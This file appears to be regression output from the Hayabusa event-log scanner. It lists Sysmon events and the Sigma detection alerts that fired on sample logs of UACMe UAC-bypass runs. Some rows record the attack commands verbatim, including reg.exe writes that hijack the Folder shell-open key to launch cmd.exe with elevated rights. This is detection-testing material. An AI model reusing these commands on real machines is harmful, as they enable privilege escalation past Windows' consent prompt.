+2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 376 0000028064463A00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7840 | PGUID: 747F3D96-A356-5D45-0000-001006D49901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3b3 | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.508 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\System32\mmc.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901 | Hash: SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | LID: 0x18d3b3 | PID: 5396 | PGUID: 747F3D96-A357-5D45-0000-0010BD149A01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
+2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 41 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 00000280644BB040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1080 | PGUID: 747F3D96-A54E-5D45-0000-0010D507A101,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x18d3b3 | PID: 1716 | PGUID: 747F3D96-A54F-5D45-0000-0010D83FA101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 00:16:31.875 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx
+2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 43 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 0000028064468040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1412 | PGUID: 747F3D96-88AA-5D46-0000-00101C9F7D03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 330 000002806444C490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6488 | PGUID: 747F3D96-88AA-5D46-0000-001059C57D03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} | LID: 0x18d3b3 | PID: 4300 | PGUID: 747F3D96-88AB-5D46-0000-001081ED7D03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 16:26:36.239 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
+2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-45 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\exefile\shell\open\command\(Default): c:\Windows\SysWOW64\notepad.exe | Process: C:\Windows\explorer.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5980 | PGUID: 747F3D96-9DB0-5D46-0000-0010AE65AF03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\ChangePk.exe"" | Process: C:\Windows\System32\changepk.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\slui.exe"" 0x03 | LID: 0x18d3b3 | PID: 2364 | PGUID: 747F3D96-9DB2-5D46-0000-00106DBDAF03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 444 00000280644250C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5208 | PGUID: 747F3D96-9DB4-5D46-0000-0010F825B003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey | Process: C:\Windows\System32\SystemSettingsAdminFlows.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel | LID: 0x18d3b3 | PID: 7880 | PGUID: 747F3D96-9DB4-5D46-0000-00105E3CB003",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 17:56:22.267 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
+2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 53 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 7312 | PGUID: 747F3D96-A104-5D46-0000-0010C79CBC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.893 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:29.060 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-53 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Folder\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3fb | PID: 4512 | PGUID: 747F3D96-A105-5D46-0000-001071B8BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 300 000002806445E5C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7604 | PGUID: 747F3D96-A105-5D46-0000-001020C0BC03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3b3 | PID: 4532 | PGUID: 747F3D96-A105-5D46-0000-00103BEBBC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,PrivEsc | Evas,High Integrity Sdclt Process,,rules/sigma/process_creation/proc_creation_win_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-A106-5D46-0000-00107201BD03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | LID: 0x18d3b3 | PID: 6604 | PGUID: 747F3D96-A106-5D46-0000-00102425BD03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:10:35.454 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
+2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:57.800 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3296 | PGUID: 747F3D96-A685-5D46-0000-00100D41D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3020 | PGUID: 747F3D96-A686-5D46-0000-00108F56D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.714 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Tgt Process: C:\Windows\system32\msconfig.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5860 | Src PGUID: 747F3D96-A685-5D46-0000-00106442D703 | Tgt PID: 3020 | Tgt PGUID: 747F3D96-A686-5D46-0000-00108F56D703,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 322 000002806447A490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4660 | PGUID: 747F3D96-A686-5D46-0000-00100958D703,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3b3 | PID: 4544 | PGUID: 747F3D96-A686-5D46-0000-0010EA77D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:34:00.871 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 18:34:01.014 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
+2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 56 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
